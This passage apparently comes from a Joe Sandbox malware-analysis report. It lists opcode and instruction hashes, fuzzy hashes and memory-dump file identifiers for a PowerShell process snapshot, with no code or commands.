            • Opcode ID: 1f1b3f43ea974ab79b18cda094ed36b49d4ffcce57ca4472a85761e5613efe08
            • Instruction ID: 45d7e598356c8f07b706fb28c7e6a9342545d9ea6ffc1d4886271bd7644fe7f5
            • Opcode Fuzzy Hash: 1f1b3f43ea974ab79b18cda094ed36b49d4ffcce57ca4472a85761e5613efe08
            • Instruction Fuzzy Hash: BEB18056A0F7D25FEB92572C98F20E67FA4DE5326970D00F7C6C5CA093D94C580BA362
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b884096dde1e1bf931f675eb4f55ab799194e8a1f13a07df2f24031f699a4819
            • Instruction ID: e3ec12a8fb58d97a26c7895bf81ef80b459c2ac17a813ea1fecb5d090465318b
            • Opcode Fuzzy Hash: b884096dde1e1bf931f675eb4f55ab799194e8a1f13a07df2f24031f699a4819
            • Instruction Fuzzy Hash: 76318647B0FAC657F362432C58F50EDBF90DE1326471906F3CA85CA093AD4D6857B662